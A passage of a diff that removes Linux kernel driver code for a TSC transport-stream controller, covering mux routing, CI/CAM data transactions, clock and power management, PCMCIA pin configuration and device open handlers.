-- src_val = MUX_EXTERNAL_DEMOD_1;
-- break;
-- case TSC_SOURCE_INTERNAL:
-- src_val = MUX_INTERNAL_DEMOD;
-- break;
-- case TSC_SOURCE_CICAM:
-- src_val = MUX_CICAM;
-- break;
-- default:
-- pr_err("%s: unidentified source parameter\n", __func__);
-- ret = -EINVAL;
-- goto err;
-- }
--
-- /* Reading the current muxes state, to change only the requested mux */
-- mux_cfg_reg = readl_relaxed(tsc_device->base + TSC_MUX_CFG);
--
-- switch (dest) {
-- case TSC_DEST_TSPP0:
-- mux_cfg_reg &= ~(0x3 << MUX0_OFFS);
-- mux_cfg_reg |= (src_val << MUX0_OFFS);
-- break;
-- case TSC_DEST_TSPP1:
-- mux_cfg_reg &= ~(0x3 << MUX1_OFFS);
-- mux_cfg_reg |= (src_val << MUX1_OFFS);
-- break;
-- case TSC_DEST_CICAM:
-- if (src_val == TSC_SOURCE_CICAM) {
-- pr_err("%s: Error: CICAM cannot be source and dest\n",
-- __func__);
-- ret = -EINVAL;
-- goto err;
-- }
-- mux_cfg_reg &= ~(0x3 << MUX_CAM_OFFS);
-- mux_cfg_reg |= (src_val << MUX_CAM_OFFS);
-- break;
-- default:
-- pr_err("%s: unidentified dest parameter\n", __func__);
-- ret = -EINVAL;
-- goto err;
-- }
--
-- writel_relaxed(mux_cfg_reg, tsc_device->base + TSC_MUX_CFG);
--
--err:
-- return
ret; --} -- --/** -- * is_tsc_idle() - Checking if TSC is idle. -- * -- * @tsc_ci: TSC CI device. -- * -- * Reading the TSC state-machine register and checking if the TSC is busy in -- * one of the operations reflected by this register. -- * -- * Return true if the TSC is idle and false if it's busy. -- */ --static bool is_tsc_idle(struct tsc_ci_chdev *tsc_ci) --{ -- u32 fsm_reg; -- -- fsm_reg = readl_relaxed(tsc_device->base + TSC_FSM_STATE); -- if (GETL_BITS(fsm_reg, FSM_STATE_BUFFER_BEG, FSM_STATE_BUFFER_END) || -- GETL_BITS(fsm_reg, FSM_STATE_POLL_BEG, FSM_STATE_POLL_END) || -- GETL_BITS(fsm_reg, FSM_STATE_BYTE_BEG, FSM_STATE_BYTE_END) || -- GETL_BITS(fsm_reg, FSM_STATE_MEM_WR_BEG, -- FSM_STATE_MEM_WR_END) || -- GETL_BITS(fsm_reg, FSM_STATE_MEM_RD_BEG, -- FSM_STATE_MEM_RD_END) || -- GETL_BITS(fsm_reg, FSM_STATE_IO_RD_BEG, FSM_STATE_IO_RD_END) || -- GETL_BITS(fsm_reg, FSM_STATE_IO_WR_BEG, FSM_STATE_IO_WR_END) || -- tsc_ci->data_busy) -- return false; -- -- tsc_ci->data_busy = true; -- -- return true; --} -- -- --/** -- * tsc_power_on_buff_mode_clocks() - power-on the TSPP2 and VBIF clocks. -- * -- * Power-on the TSPP2 and the VBIF clocks required for buffer mode transaction. -- * -- * Return 0 on success, error value otherwise. 
-- */
--static int tsc_power_on_buff_mode_clocks(void)
--{
-- int ret = 0;
--
-- ret = clk_prepare_enable(tsc_device->tspp2_core_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start tspp2_core_clk", __func__);
-- goto err_tspp2;
-- }
-- ret = clk_prepare_enable(tsc_device->vbif_tspp2_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start vbif_tspp2_clk", __func__);
-- goto err_vbif_tspp2;
-- }
-- ret = clk_prepare_enable(tsc_device->vbif_ahb_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start vbif_ahb_clk", __func__);
-- goto err_vbif_ahb;
-- }
-- ret = clk_prepare_enable(tsc_device->vbif_axi_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start vbif_axi_clk", __func__);
-- goto err_vbif_axi;
-- }
--
-- return ret;
--
--err_vbif_axi:
-- clk_disable_unprepare(tsc_device->vbif_ahb_clk);
--err_vbif_ahb:
-- clk_disable_unprepare(tsc_device->vbif_tspp2_clk);
--err_vbif_tspp2:
-- clk_disable_unprepare(tsc_device->tspp2_core_clk);
--err_tspp2:
-- return ret;
--}
--
--/**
-- * tsc_power_off_buff_mode_clocks() - power-off the SPP2 and VBIF clocks.
-- *
-- * Power-off the TSPP2 and the VBIF clocks required for buffer mode transaction.
-- */
--static void tsc_power_off_buff_mode_clocks(void)
--{
-- clk_disable_unprepare(tsc_device->vbif_axi_clk);
-- clk_disable_unprepare(tsc_device->vbif_ahb_clk);
-- clk_disable_unprepare(tsc_device->tspp2_core_clk);
-- clk_disable_unprepare(tsc_device->vbif_tspp2_clk);
--}
--
--/**
-- * tsc_config_cam_data_transaction() - Configuring a new data transaction.
-- *
-- * @addr_size: The value for the address_size register field- address when
-- * using single byte-mode, and size when using buffer mode.
-- * @wr_data: the value for the wr_data register field- data to write to the
-- * cam when using single byte mode.
-- * @io_mem: The value for the io_mem register field- 1 for IO transaction,
-- * 0 for memory transaction.
-- * @read_write: The value for the read_write register field- 1 for read
-- * transaction, 0 for write transaction.
-- * @buff_mode: The value for the buff_mode register field- 1 for buffer mode,
-- * 0 for single byte mode.
-- *
-- * Configuring the cam cmd register with the specified parameters, to initiate
-- * data transaction with the cam.
-- */
--static void tsc_config_cam_data_transaction(u16 addr_size,
-- u8 wr_data,
-- uint io_mem,
-- uint read_write,
-- uint buff_mode)
--{
-- u32 cam_cmd_reg = 0;
--
-- cam_cmd_reg |= (addr_size << CAM_CMD_ADDR_SIZE_OFFS);
-- cam_cmd_reg |= (wr_data << CAM_CMD_WR_DATA_OFFS);
-- cam_cmd_reg |= (io_mem << CAM_CMD_IO_MEM_OFFS);
-- cam_cmd_reg |= (read_write << CAM_CMD_RD_WR_OFFS);
-- cam_cmd_reg |= (buff_mode << CAM_CMD_BUFF_MODE_OFFS);
-- writel_relaxed(cam_cmd_reg, tsc_device->base + TSC_CAM_CMD);
--}
--
--/**
-- * tsc_data_transaction() - Blocking function that manage the data transactions.
-- *
-- * @tsc_ci: TSC CI device.
-- * @io_mem: The value for the io_mem register field- 1 for IO transaction,
-- * 0 for memory transaction.
-- * @read_write: The value for the read_write register field- 1 for read
-- * transaction, 0 for write transaction.
-- * @buff_mode: The value for the buff_mode register field- 1 for buffer mode,
-- * 0 for single byte mode.
-- * @arg: The argument received from the user-space via a data transaction
-- * IOCTL. It is from one of the two following types:
-- * "struct tsc_single_byte_mode" and "struct tsc_buffer_mode".
-- *
-- * Receiving the transaction paramters from the user-space. Configure the HW
-- * registers to initiate a data transaction with the cam. Wait for an
-- * interrupt indicating the transaction is over and return the the data read
-- * from the cam in case of single-byte read transaction.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_data_transaction(struct tsc_ci_chdev *tsc_ci, uint io_mem,
-- uint read_write, uint buff_mode, unsigned long arg)
--{
-- struct tsc_single_byte_mode arg_byte;
-- struct tsc_buffer_mode arg_buff;
-- u16 addr_size;
-- u8 wr_data;
-- uint timeout;
-- u32 cam_cmd_reg;
-- struct ion_handle *ion_handle = NULL;
-- ion_phys_addr_t iova = 0;
-- unsigned long buffer_size = 0;
-- unsigned long flags = 0;
-- int ret = 0;
--
-- if (!arg)
-- return -EINVAL;
--
-- /* make sure the tsc is in idle state before configuring the cam */
-- if (!is_tsc_idle(tsc_ci)) {
-- ret = -EBUSY;
-- goto finish;
-- }
--
-- INIT_COMPLETION(tsc_ci->transaction_finish);
--
-- /* copying data from the ioctl parameter */
-- if (buff_mode == SINGLE_BYTE_MODE) {
-- if (copy_from_user(&arg_byte, (void *)arg,
-- sizeof(struct tsc_single_byte_mode))) {
-- ret = -EFAULT;
-- goto err_copy_arg;
-- }
-- addr_size = arg_byte.address;
-- if (IO_TRANSACTION == io_mem &&
-- addr_size > CICAM_MAX_ADDRESS) {
-- pr_err("%s: wrong address parameter: %d\n", __func__,
-- addr_size);
-- ret = -EFAULT;
-- goto err_copy_arg;
-- }
-- wr_data = arg_byte.data;
-- timeout = arg_byte.timeout;
-- } else {
-- if (copy_from_user(&arg_buff, (void *)arg,
-- sizeof(struct tsc_buffer_mode))) {
-- ret = -EFAULT;
-- goto err_copy_arg;
-- }
-- addr_size = arg_buff.buffer_size;
-- if (!addr_size) {
-- pr_err("%s: size parameter is 0\n", __func__);
-- ret = -EFAULT;
-- goto err_copy_arg;
-- }
-- wr_data = 0;
-- timeout = arg_buff.timeout;
--
-- /* import ion handle from the ion fd passed from user-space */
-- ion_handle = ion_import_dma_buf
-- (tsc_device->iommu_info.ion_client, arg_buff.buffer_fd);
-- if (IS_ERR_OR_NULL(ion_handle)) {
-- pr_err("%s: get_ION_handle failed\n", __func__);
-- ret = -EIO;
-- goto err_ion_handle;
-- }
--
-- /*
-- * mapping the ion handle to the VBIF and get the virtual
-- * address
-- */
-- ret = ion_map_iommu(tsc_device->iommu_info.ion_client,
-- ion_handle, tsc_device->iommu_info.domain_num,
-- tsc_device->iommu_info.partition_num, SZ_4K,
-- 0, &iova, &buffer_size, 0, 0);
--
-- if (ret != 0) {
-- pr_err("%s: get_ION_kernel physical addr fail\n",
-- __func__);
-- goto err_ion_map;
-- }
--
-- /*
-- * writing the buffer virtual address to the register for buffer
-- * address of buffer mode
-- */
-- if (read_write == READ_TRANSACTION)
-- writel_relaxed(iova,
-- tsc_device->base + TSC_RD_BUFF_ADDR);
-- else /* write transaction */
-- writel_relaxed(iova,
-- tsc_device->base + TSC_WR_BUFF_ADDR);
-- }
--
-- /* configuring the cam command register */
-- tsc_config_cam_data_transaction(addr_size, wr_data, io_mem, read_write,
-- buff_mode);
--
-- /*
-- * This function assume the mutex is locked before calling the function,
-- * so mutex has to be unlocked before going to sleep when waiting for
-- * the transaction.
-- */
-- mutex_unlock(&tsc_ci->mutex);
-- /* waiting for EOT interrupt or timeout */
-- if (!wait_for_completion_timeout(&tsc_ci->transaction_complete,
-- msecs_to_jiffies(timeout))) {
-- pr_err("%s: Error: wait for transaction timed-out\n", __func__);
-- ret = -ETIMEDOUT;
-- mutex_lock(&tsc_ci->mutex);
-- /* Aborting the transaction if it's buffer mode */
-- if (buff_mode) {
-- cam_cmd_reg = readl_relaxed(tsc_device->base +
-- TSC_CAM_CMD);
-- SET_BIT(CAM_CMD_ABORT, cam_cmd_reg);
-- writel_relaxed(cam_cmd_reg, tsc_device->base +
-- TSC_CAM_CMD);
-- }
-- goto finish;
-- }
-- mutex_lock(&tsc_ci->mutex);
--
-- /* Checking if transaction ended with error */
-- spin_lock_irqsave(&tsc_ci->spinlock, flags);
-- if (tsc_ci->transaction_state == TRANSACTION_ERROR) {
-- tsc_ci->transaction_state = BEFORE_TRANSACTION;
-- spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
-- pr_err("%s: Transaction error\n", __func__);
-- ret = -EBADE; /* Invalid exchange error code */
-- goto finish;
-- } else if (tsc_ci->transaction_state == TRANSACTION_CARD_REMOVED) {
-- tsc_ci->transaction_state = BEFORE_TRANSACTION;
-- spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
-- pr_err("%s: Card was removed during the transaction. Aborting\n",
-- __func__);
-- ret = -ECONNABORTED;
-- /* Aborting the transaction if it's buffer mode */
-- if (buff_mode) {
-- cam_cmd_reg = readl_relaxed(tsc_device->base +
-- TSC_CAM_CMD);
-- SET_BIT(CAM_CMD_ABORT, cam_cmd_reg);
-- writel_relaxed(cam_cmd_reg, tsc_device->base +
-- TSC_CAM_CMD);
-- }
-- goto finish;
-- }
--
-- /* reseting the argument after reading the interrupt type */
-- tsc_ci->transaction_state = BEFORE_TRANSACTION;
-- spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--
-- /*
-- * Only on case of read single byte operation, we need to copy the data
-- * to the arg data field
-- */
-- if (buff_mode == SINGLE_BYTE_MODE && read_write == READ_TRANSACTION)
-- ret = put_user(readl_relaxed(tsc_device->base +
-- TSC_CAM_RD_DATA),
-- &((struct tsc_single_byte_mode *)arg)->data);
--
--finish:
-- if (iova != 0)
-- ion_unmap_iommu(tsc_device->iommu_info.ion_client, ion_handle,
-- tsc_device->iommu_info.domain_num,
-- tsc_device->iommu_info.partition_num);
--err_ion_map:
-- if (!IS_ERR_OR_NULL(ion_handle))
-- ion_free(tsc_device->iommu_info.ion_client, ion_handle);
--err_ion_handle:
--err_copy_arg:
-- tsc_ci->data_busy = false;
-- INIT_COMPLETION(tsc_ci->transaction_complete);
-- complete_all(&tsc_ci->transaction_finish);
-- return ret;
--}
--
--/**
-- * tsc_personality_change() - change the PCMCIA pins state.
-- *
-- * @pcmcia_state: The new state of the PCMCIA pins.
-- *
-- * Configure the TLMM pins of the PCMCIA according to received state and
-- * the current pinctrl configuration of the other pins. This function assums the
-- * PCMCIA pinctrl definitions were successfully parsed from the devicetree (this
-- * check is done at open device).
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_personality_change(enum tsc_cam_personality pcmcia_state)
--{
-- int ret = 0;
-- struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
-- struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
-- u32 reg = 0;
--
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (pcmcia_state == (enum tsc_cam_personality)pcurr_state->pcmcia_state)
-- goto exit;
--
-- /* Transition from current pinctrl state to curr + new pcmcia state */
-- switch (pcmcia_state) {
-- case TSC_CICAM_PERSONALITY_CI:
-- if (pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_ci_card);
-- else if (pcurr_state->ts0 && !pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_ci_card);
-- else if (!pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_ci_card);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ci_card);
-- break;
-- case TSC_CICAM_PERSONALITY_CIPLUS:
-- if (pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts_ci_plus);
-- else if (pcurr_state->ts0 && !pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0_ci_plus);
-- else if (!pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1_ci_plus);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ci_plus);
-- break;
-- case TSC_CICAM_PERSONALITY_DISABLE:
-- if (pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->dual_ts);
-- else if (pcurr_state->ts0 && !pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts0);
-- else if (!pcurr_state->ts0 && pcurr_state->ts1)
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->ts1);
-- else
-- ret = pinctrl_select_state(ppinctrl->pinctrl,
-- ppinctrl->disable);
-- break;
-- default:
-- pr_err("%s: Wrong personality parameter\n", __func__);
-- ret = -EINVAL;
-- goto exit;
-- }
--
-- if (ret != 0) {
-- pr_err("%s: error changing PCMCIA pins. ret value = %d\n",
-- __func__, ret);
-- ret = -EINVAL;
-- goto exit;
-- }
--
-- /* Update the current pcmcia state in the internal struct */
-- pcurr_state->pcmcia_state = (enum pcmcia_state)pcmcia_state;
--
-- /*
-- * Setting CAM TSIF OE to enable I/O transactions for CI/+ cards
-- * or clearing it when moving to disable state
-- */
-- if (TSC_CICAM_PERSONALITY_CI == pcmcia_state ||
-- TSC_CICAM_PERSONALITY_CIPLUS == pcmcia_state) {
-- SET_BIT(TSC_CICAM_TSIF_OE_OFFS, reg);
-- writel_relaxed(reg, tsc_device->base + TSC_CICAM_TSIF);
-- } else {
-- CLEAR_BIT(TSC_CICAM_TSIF_OE_OFFS, reg);
-- writel_relaxed(reg, tsc_device->base + TSC_CICAM_TSIF);
-- }
--
--exit:
-- mutex_unlock(&tsc_device->mutex);
-- return ret;
--}
--
--/**
-- * tsc_reset_cam() - HW reset to the CAM.
-- *
-- * Toggle the reset pin of the pcmcia to make a HW reset.
-- * This function assumes that pinctrl_select_state was already called on the
-- * reset pin with its active state (happens during personality change).
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_reset_cam(void)
--{
-- int ret;
-- int reset_gpio = tsc_device->reset_cam_gpio;
--
-- /* Toggle the GPIO to create a reset pulse */
-- ret = gpio_direction_output(reset_gpio, 0); /* Make sure it's 0 */
-- if (ret != 0)
-- goto err;
--
-- ret = gpio_direction_output(reset_gpio, 1); /* Assert */
-- if (ret != 0)
-- goto err;
--
-- /*
-- * Waiting to enable the CAM to process the assertion before the
-- * deassertion. 1ms is needed for this processing.
-- */
-- usleep(1000);
--
-- ret = gpio_direction_output(reset_gpio, 0); /* Deassert */
-- if (ret != 0)
-- goto err;
--
-- return 0;
--err:
-- pr_err("%s: Failed writing to reset cam GPIO\n", __func__);
-- return ret;
--}
--
--/**
-- * tsc_reset_registers() - Reset the TSC registers.
-- *
-- * Write specific reset values to the TSC registers, managed by the driver.
-- */
--static void tsc_reset_registers(void)
--{
-- /* Reset state - all mux transfer ext. demod 0 */
-- writel_relaxed(0x00000000, tsc_device->base + TSC_MUX_CFG);
--
-- /* Disabling TSIFs inputs, putting polarity to normal, data as serial */
-- writel_relaxed(0x02000200, tsc_device->base + TSC_IN_IFC_EXT);
-- writel_relaxed(0x02000200, tsc_device->base + TSC_IN_IFC_CFG_INT);
--
-- /* Reseting TSC_FSM_STATE_MASK to represent all the states but poll */
-- writel_relaxed(0x3333300F, tsc_device->base + TSC_FSM_STATE_MASK);
--
-- /* Clearing all the CAM interrupt */
-- writel_relaxed(0x1F, tsc_device->base + TSC_IRQ_CLR);
--
-- /* Disabling all cam interrupts (enable is done at - open) */
-- writel_relaxed(0x00, tsc_device->base + TSC_IRQ_ENA);
--
-- /* Disabling HW polling */
-- writel_relaxed(0x00, tsc_device->base + TSC_CIP_CFG);
--
-- /* Reset state - address for read/write buffer */
-- writel_relaxed(0x00000000, tsc_device->base + TSC_RD_BUFF_ADDR);
-- writel_relaxed(0x00000000, tsc_device->base + TSC_WR_BUFF_ADDR);
--
-- /* Clearing false cd counter */
-- writel_relaxed(0x01, tsc_device->base + TSC_FALSE_CD_CLR);
-- writel_relaxed(0x00, tsc_device->base + TSC_FALSE_CD_CLR);
--
-- /* Disabling TSIF out to cicam and IO read/write with the CAM */
-- writel_relaxed(0x00000000, tsc_device->base + TSC_CICAM_TSIF);
--}
--
--/**
-- * tsc_disable_tsifs() - Disable all the TSC Tsifs.
-- *
-- * Disable the TSIFs of the ext. demods, the int. demod and the cam on both
-- * directions.
-- */
--static void tsc_disable_tsifs(void)
--{
-- u32 reg;
--
-- /* Ext. TSIFs */
-- reg = readl_relaxed(tsc_device->base + TSC_IN_IFC_EXT);
-- SET_BIT(TSIF_DISABLE_OFFS, reg);
-- SET_BIT((TSIF_DISABLE_OFFS + 16), reg);
-- writel_relaxed(reg, tsc_device->base + TSC_IN_IFC_EXT);
--
-- /* Int. TSIF and TSIF-in from the CAM */
-- reg = readl_relaxed(tsc_device->base + TSC_IN_IFC_CFG_INT);
-- SET_BIT(TSIF_DISABLE_OFFS, reg);
-- SET_BIT((TSIF_DISABLE_OFFS + 16), reg);
-- writel_relaxed(reg, tsc_device->base + TSC_IN_IFC_CFG_INT);
--}
--
--/**
-- * tsc_power_on_clocks() - power-on the TSC clocks.
-- *
-- * Power-on the TSC clocks required for Mux and/or CI operations.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_power_on_clocks(void)
--{
-- int ret = 0;
-- unsigned long rate_in_hz = 0;
--
-- /* Enabling the clocks */
-- ret = clk_prepare_enable(tsc_device->ahb_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start tsc_ahb_clk", __func__);
-- return ret;
-- }
--
-- /* We need to set the rate of ci clock before enabling it */
-- rate_in_hz = clk_round_rate(tsc_device->ci_clk, 1);
-- if (clk_set_rate(tsc_device->ci_clk, rate_in_hz)) {
-- pr_err("%s: Failed to set rate to tsc_ci clock\n", __func__);
-- goto err;
-- }
--
-- ret = clk_prepare_enable(tsc_device->ci_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start tsc_ci_clk", __func__);
-- goto err;
-- }
--
-- return ret;
--err:
-- clk_disable_unprepare(tsc_device->ahb_clk);
-- return ret;
--}
--
--/**
-- * tsc_power_off_clocks() - power-off the TSC clocks.
-- *
-- * Power-off the TSC clocks required for Mux and/or CI operations.
-- */
--static void tsc_power_off_clocks(void)
--{
-- clk_disable_unprepare(tsc_device->ahb_clk);
-- clk_disable_unprepare(tsc_device->ci_clk);
--}
--
--/**
-- * tsc_mux_power_on_clocks() - power-on the TSC Mux clocks.
-- *
-- * Power-on the TSC clocks required only for Mux operations, and not for CI.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_mux_power_on_clocks(void)
--{
-- int ret = 0;
--
-- /* Setting the cicam clock rate */
-- ret = clk_set_rate(tsc_device->cicam_ts_clk, CICAM_CLK_RATE_7MHZ);
-- if (ret != 0) {
-- pr_err("%s: Can't set rate for tsc_cicam_ts_clk", __func__);
-- goto err_set_rate;
-- }
--
-- /* Setting the TSC serial clock rate */
-- ret = clk_set_rate(tsc_device->ser_clk, TSC_SER_CLK_RATE);
-- if (ret != 0) {
-- pr_err("%s: Can't set rate for tsc serial clock", __func__);
-- goto err_set_rate;
-- }
--
-- /* Setting the TSC parallel clock rate */
-- ret = clk_set_rate(tsc_device->par_clk, TSC_PAR_CLK_RATE);
-- if (ret != 0) {
-- pr_err("%s: Can't set rate for tsc parallel clock", __func__);
-- goto err_set_rate;
-- }
--
-- /* Enabling the clocks */
-- ret = clk_prepare_enable(tsc_device->ser_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start tsc_ser_clk", __func__);
-- goto err_ser_clk;
-- }
-- ret = clk_prepare_enable(tsc_device->par_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start tsc_par_clk", __func__);
-- goto err_par_clk;
-- }
-- ret = clk_prepare_enable(tsc_device->cicam_ts_clk);
-- if (ret != 0) {
-- pr_err("%s: Can't start tsc_cicam_ts_clk", __func__);
-- goto err_cicam_ts_clk;
-- }
--
-- return ret;
--
--err_cicam_ts_clk:
-- clk_disable_unprepare(tsc_device->par_clk);
--err_par_clk:
-- clk_disable_unprepare(tsc_device->ser_clk);
--err_ser_clk:
--err_set_rate:
-- return ret;
--}
--
--/**
-- * tsc_mux_power_off_clocks() - power-off the TSC Mux clocks.
-- *
-- * Power-off the TSC clocks required only for Mux operations, and not for CI.
-- */
--static void tsc_mux_power_off_clocks(void)
--{
-- clk_disable_unprepare(tsc_device->ser_clk);
-- clk_disable_unprepare(tsc_device->par_clk);
-- clk_disable_unprepare(tsc_device->cicam_ts_clk);
--}
--
--/**
-- * tsc_device_power_up() - Power init done by the first device opened.
-- *
-- * Check if it's the first device and enable the GDSC,power-on the TSC clocks
-- * required for both Mux and CI, Vote for the bus and reset the registers to a
-- * known default values.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_device_power_up(void)
--{
-- int ret = 0;
--
-- if (mutex_lock_interruptible(&tsc_device->mutex))
-- return -ERESTARTSYS;
--
-- if (tsc_device->num_device_open > 0)
-- goto not_first_device;
--
-- /* Enable the GDSC */
-- ret = regulator_enable(tsc_device->gdsc);
-- if (ret != 0) {
-- pr_err("%s: Failed to enable regulator\n", __func__);
-- goto err_regulator;
-- }
--
-- /* Power-on the clocks needed by Mux and CI */
-- ret = tsc_power_on_clocks();
-- if (ret != 0)
-- goto err_power_clocks;
--
-- /* Voting for bus bandwidth */
-- if (tsc_device->bus_client) {
-- ret = msm_bus_scale_client_update_request
-- (tsc_device->bus_client, 1);
-- if (ret) {
-- pr_err("%s: Can't enable bus\n", __func__);
-- goto err_bus;
-- }
-- }
--
-- /* Reset the TSC TLMM pins to a default state */
-- ret = pinctrl_select_state(tsc_device->pinctrl_info.pinctrl,
-- tsc_device->pinctrl_info.disable);
-- if (ret != 0) {
-- pr_err("%s: Failed to disable the TLMM pins\n", __func__);
-- goto err_pinctrl;
-- }
-- /* Update the current pinctrl state in the internal struct */
-- tsc_device->pinctrl_info.curr_state.ts0 = false;
-- tsc_device->pinctrl_info.curr_state.ts1 = false;
-- tsc_device->pinctrl_info.curr_state.pcmcia_state =
-- TSC_CICAM_PERSONALITY_DISABLE;
--
-- /* Reset TSC registers to a default known state */
-- tsc_reset_registers();
--
--not_first_device:
-- tsc_device->num_device_open++;
-- mutex_unlock(&tsc_device->mutex);
-- return ret;
--
--err_pinctrl:
-- if (tsc_device->bus_client)
-- msm_bus_scale_client_update_request(tsc_device->bus_client, 0);
--err_bus:
-- tsc_power_off_clocks();
--err_power_clocks:
-- regulator_disable(tsc_device->gdsc);
--err_regulator:
-- mutex_unlock(&tsc_device->mutex);
-- return ret;
--}
--
--/**
-- * tsc_device_power_off() - Power off done by the last device closed.
-- *
-- * Check if it's the last device and unvote the bus, power-off the TSC clocks
-- * required for both Mux and CI, disable the TLMM pins and disable the GDSC.
-- */
--static void tsc_device_power_off(void)
--{
-- mutex_lock(&tsc_device->mutex);
--
-- if (tsc_device->num_device_open > 1)
-- goto not_last_device;
--
-- pinctrl_select_state(tsc_device->pinctrl_info.pinctrl,
-- tsc_device->pinctrl_info.disable);
-- if (tsc_device->bus_client)
-- msm_bus_scale_client_update_request(tsc_device->bus_client, 0);
--
-- tsc_power_off_clocks();
-- regulator_disable(tsc_device->gdsc);
--
--not_last_device:
-- tsc_device->num_device_open--;
-- mutex_unlock(&tsc_device->mutex);
--}
--
--
--/************************** TSC file operations **************************/
--/**
-- * tsc_mux_open() - init the TSC Mux char device.
-- *
-- * @inode: The inode associated with the TSC Mux device.
-- * @flip: The file pointer associated with the TSC Mux device.
-- *
-- * Enables only one open Mux device.
-- * Init all the data structures and vote for all the power resources needed.
-- * Manage reference counters for initiating resources upon first open.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_mux_open(struct inode *inode, struct file *filp)
--{
-- struct tsc_mux_chdev *tsc_mux;
-- int ret = 0;
-- u32 ena_reg;
--
-- if (mutex_lock_interruptible(&tsc_device->mux_chdev.mutex))
-- return -ERESTARTSYS;
--
-- if (tsc_device->num_mux_opened > 0) {
-- pr_err("%s: Too many devices open\n", __func__);
-- mutex_unlock(&tsc_device->mux_chdev.mutex);
-- return -EMFILE;
-- }
-- tsc_device->num_mux_opened++;
--
-- tsc_mux = container_of(inode->i_cdev, struct tsc_mux_chdev, cdev);
-- filp->private_data = tsc_mux;
--
-- /* Init all resources if it's the first device (checked inside) */
-- ret = tsc_device_power_up();
-- if (ret != 0)
-- goto err_first_device;
--
-- /* Power-on the Mux clocks */
-- ret = tsc_mux_power_on_clocks();
-- if (ret != 0)
-- goto err_mux_clocks;
--
-- /* Init TSC Mux args */
-- spin_lock_init(&tsc_mux->spinlock);
-- init_waitqueue_head(&tsc_mux->poll_queue);
-- tsc_mux->rate_interrupt = false;
--
-- /* Enabling TSC Mux cam interrupt of rate mismatch */
-- ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
-- SET_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
-- writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
-- mutex_unlock(&tsc_device->mux_chdev.mutex);
--
-- return ret;
--
--err_mux_clocks:
-- /* De-init all resources if it's the only device (checked inside) */
-- tsc_device_power_off();
--err_first_device:
-- tsc_device->num_mux_opened--;
-- mutex_unlock(&tsc_device->mux_chdev.mutex);
-- return ret;
--}
--
--/**
-- * tsc_ci_open() - init the TSC CI char device.
-- *
-- * @inode: The inode associated with the TSC Mux device.
-- * @flip: The file pointer associated with the TSC Mux device.
-- *
-- * Enables only one open CI device.
-- * Init all the data structures and vote for all the power resources needed.
-- * Manage reference counters for initiating resources upon first open.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_ci_open(struct inode *inode, struct file *filp)
--{
-- struct tsc_ci_chdev *tsc_ci;
-- int ret = 0;
-- u32 ena_reg;
--
-- if (mutex_lock_interruptible(&tsc_device->ci_chdev.mutex))
-- return -ERESTARTSYS;
--
-- if (tsc_device->num_ci_opened > 0) {
-- pr_err("%s: Too many devices open\n", __func__);
-- mutex_unlock(&tsc_device->ci_chdev.mutex);
-- return -EMFILE;
-- }
--
-- if (!tsc_device->pinctrl_info.is_pcmcia) {
-- pr_err("%s: No pcmcia pinctrl definitions were found in the TSC devicetree\n",
-- __func__);
-- mutex_unlock(&tsc_device->ci_chdev.mutex);
-- return -EPERM;
-- }
--
-- tsc_device->num_ci_opened++;
--
-- tsc_ci = container_of(inode->i_cdev, struct tsc_ci_chdev, cdev);
-- filp->private_data = tsc_ci;
--
-- /* Init all resources if it's the first device (checked inside) */
-- ret = tsc_device_power_up();
-- if (ret != 0)
-- goto err_first_device;
--
-- /* powering-up the tspp2 and VBIF clocks */
-- ret = tsc_power_on_buff_mode_clocks();
-- if (ret != 0)
-- goto err_buff_clocks;
--
-- /* Request reset CAM GPIO */
-- ret = gpio_request(tsc_device->reset_cam_gpio, "tsc_ci_reset");
-- if (ret != 0) {
-- pr_err("%s: Failed to request reset CAM GPIO\n", __func__);
-- goto err_gpio_req;
-- }
--
-- /* Set the reset line to default "no card" state */
-- ret = gpio_direction_output(tsc_device->reset_cam_gpio, 1);
-- if (ret != 0) {
-- pr_err("%s: Failed to assert the reset CAM GPIO\n", __func__);
-- goto err_assert;
-- }
--
-- /* Attach the iommu group to support the required memory mapping */
